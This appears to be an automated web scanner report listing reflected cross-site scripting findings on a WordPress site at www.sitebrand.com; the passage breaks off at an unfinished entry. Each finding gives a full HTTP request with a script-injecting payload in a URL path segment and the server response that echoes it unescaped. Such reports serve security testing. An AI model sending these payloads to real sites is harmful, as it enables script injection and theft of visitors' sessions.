GET /wp-content/plugins/tabbed-widgets/js/jquery-ui-accordion.min.js44034"><script>alert(1)</script>0cb6d32e4c4 HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:42 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:42 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24644
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-content/plugins/tabbed-widgets/js/jquery-ui-accordion.min.js44034\"><script>alert(1)</script>0cb6d32e4c4" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12b95"><script>alert(1)</script>a48f0c4b268 was submitted in the REST URL parameter 1. This input was echoed as 12b95\"><script>alert(1)</script>a48f0c4b268 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content12b95"><script>alert(1)</script>a48f0c4b268/plugins/tabbed-widgets/js/jquery-ui-effects.min.js HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:35 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:35 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24640
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-content12b95\"><script>alert(1)</script>a48f0c4b268/plugins/tabbed-widgets/js/jquery-ui-effects.min.js" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5898"><script>alert(1)</script>9a24ab82fe4 was submitted in the REST URL parameter 2. This input was echoed as f5898\"><script>alert(1)</script>9a24ab82fe4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/pluginsf5898"><script>alert(1)</script>9a24ab82fe4/tabbed-widgets/js/jquery-ui-effects.min.js HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:36 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:36 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24640
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-content/pluginsf5898\"><script>alert(1)</script>9a24ab82fe4/tabbed-widgets/js/jquery-ui-effects.min.js" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44ca3"><script>alert(1)</script>d117a564d89 was submitted in the REST URL parameter 3. This input was echoed as 44ca3\"><script>alert(1)</script>d117a564d89 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/tabbed-widgets44ca3"><script>alert(1)</script>d117a564d89/js/jquery-ui-effects.min.js HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:37 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:38 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24640
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-content/plugins/tabbed-widgets44ca3\"><script>alert(1)</script>d117a564d89/js/jquery-ui-effects.min.js" /> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c4cc"><script>alert(1)</script>4f4e37b43d6 was submitted in the REST URL parameter 4. This input was echoed as 1c4cc\"><script>alert(1)</script>4f4e37b43d6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/tabbed-widgets/js1c4cc"><script>alert(1)</script>4f4e37b43d6/jquery-ui-effects.min.js HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:39 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:39 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24640
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-content/plugins/tabbed-widgets/js1c4cc\"><script>alert(1)</script>4f4e37b43d6/jquery-ui-effects.min.js" /> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a524"><script>alert(1)</script>c3b27702d45 was submitted in the REST URL parameter 5. This input was echoed as 7a524\"><script>alert(1)</script>c3b27702d45 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/tabbed-widgets/js/jquery-ui-effects.min.js7a524"><script>alert(1)</script>c3b27702d45 HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:42 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:42 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24640
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-content/plugins/tabbed-widgets/js/jquery-ui-effects.min.js7a524\"><script>alert(1)</script>c3b27702d45" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c613f"><script>alert(1)</script>26275753748 was submitted in the REST URL parameter 1. This input was echoed as c613f\"><script>alert(1)</script>26275753748 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-contentc613f"><script>alert(1)</script>26275753748/plugins/tabbed-widgets/tabbed-widgets.php HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:35 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:35 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24622
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-contentc613f\"><script>alert(1)</script>26275753748/plugins/tabbed-widgets/tabbed-widgets.php" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ccc0"><script>alert(1)</script>c72d707a232 was submitted in the REST URL parameter 2. This input was echoed as 3ccc0\"><script>alert(1)</script>c72d707a232 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins3ccc0"><script>alert(1)</script>c72d707a232/tabbed-widgets/tabbed-widgets.php HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:37 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:37 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24622
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-content/plugins3ccc0\"><script>alert(1)</script>c72d707a232/tabbed-widgets/tabbed-widgets.php" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7533"><script>alert(1)</script>626361e9619 was submitted in the REST URL parameter 3. This input was echoed as f7533\"><script>alert(1)</script>626361e9619 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/tabbed-widgetsf7533"><script>alert(1)</script>626361e9619/tabbed-widgets.php HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:39 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:39 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24622
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-content/plugins/tabbed-widgetsf7533\"><script>alert(1)</script>626361e9619/tabbed-widgets.php" /> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d7ed"><script>alert(1)</script>fcc57779af6 was submitted in the REST URL parameter 4. This input was echoed as 4d7ed\"><script>alert(1)</script>fcc57779af6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/tabbed-widgets/tabbed-widgets.php4d7ed"><script>alert(1)</script>fcc57779af6 HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:41 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:41 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24622
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-content/plugins/tabbed-widgets/tabbed-widgets.php4d7ed\"><script>alert(1)</script>fcc57779af6" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58ffe"><script>alert(1)</script>9e6c5dc642 was submitted in the REST URL parameter 1. This input was echoed as 58ffe\"><script>alert(1)</script>9e6c5dc642 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content58ffe"><script>alert(1)</script>9e6c5dc642/themes/DropdownMenuVersion/purecorpwp/pagenavi-css.css HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:32 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:32 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24646
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-content58ffe\"><script>alert(1)</script>9e6c5dc642/themes/DropdownMenuVersion/purecorpwp/pagenavi-css.css" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f790f"><script>alert(1)</script>b39cc96c08f was submitted in the REST URL parameter 2. This input was echoed as f790f\"><script>alert(1)</script>b39cc96c08f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themesf790f"><script>alert(1)</script>b39cc96c08f/DropdownMenuVersion/purecorpwp/pagenavi-css.css HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:34 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:34 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24648
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-content/themesf790f\"><script>alert(1)</script>b39cc96c08f/DropdownMenuVersion/purecorpwp/pagenavi-css.css" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45d9f"><script>alert(1)</script>38b3eb32f4b was submitted in the REST URL parameter 3. This input was echoed as 45d9f\"><script>alert(1)</script>38b3eb32f4b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/DropdownMenuVersion45d9f"><script>alert(1)</script>38b3eb32f4b/purecorpwp/pagenavi-css.css HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:35 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:35 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24648
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-content/themes/DropdownMenuVersion45d9f\"><script>alert(1)</script>38b3eb32f4b/purecorpwp/pagenavi-css.css" /> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 983fb"><script>alert(1)</script>ad9e2f97248 was submitted in the REST URL parameter 4. This input was echoed as 983fb\"><script>alert(1)</script>ad9e2f97248 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/DropdownMenuVersion/purecorpwp983fb"><script>alert(1)</script>ad9e2f97248/pagenavi-css.css HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:36 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:37 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24648
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-content/themes/DropdownMenuVersion/purecorpwp983fb\"><script>alert(1)</script>ad9e2f97248/pagenavi-css.css" /> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e593"><script>alert(1)</script>fd2c43d5993 was submitted in the REST URL parameter 5. This input was echoed as 9e593\"><script>alert(1)</script>fd2c43d5993 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/themes/DropdownMenuVersion/purecorpwp/pagenavi-css.css9e593"><script>alert(1)</script>fd2c43d5993 HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:39 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:39 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24648
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-content/themes/DropdownMenuVersion/purecorpwp/pagenavi-css.css9e593\"><script>alert(1)</script>fd2c43d5993" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9aa21"><script>alert(1)</script>10ae98f8219 was submitted in the REST URL parameter 1. This input was echoed as 9aa21\"><script>alert(1)</script>10ae98f8219 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-includes9aa21"><script>alert(1)</script>10ae98f8219/js/jquery/jquery.form.js HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:41 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:41 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24590
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-includes9aa21\"><script>alert(1)</script>10ae98f8219/js/jquery/jquery.form.js" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fb3d"><script>alert(1)</script>e88687dbfdc was submitted in the REST URL parameter 2. This input was echoed as 5fb3d\"><script>alert(1)</script>e88687dbfdc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-includes/js5fb3d"><script>alert(1)</script>e88687dbfdc/jquery/jquery.form.js HTTP/1.1 Host: www.sitebrand.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=231060509.1290806228.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; __utma=231060509.795325227.1290806228.1290806228.1290806228.1; __utmc=231060509; __utmb=231060509.3.10.1290806228;
Response
HTTP/1.1 404 Not Found Date: Fri, 26 Nov 2010 20:33:43 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.9 X-Pingback: http://www.sitebrand.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Fri, 26 Nov 2010 20:33:43 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24590
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head profile="http://gmpg.org/xfn ...[SNIP]... <input type="hidden" name="redirect_to" value="/wp-includes/js5fb3d\"><script>alert(1)</script>e88687dbfdc/jquery/jquery.form.js" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7802"><script>alert(1)</script>497f51b15d0 was submitted in the REST URL parameter 3. This input was echoed as f7802\"><script>alert(1)</script>497f51b15d0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
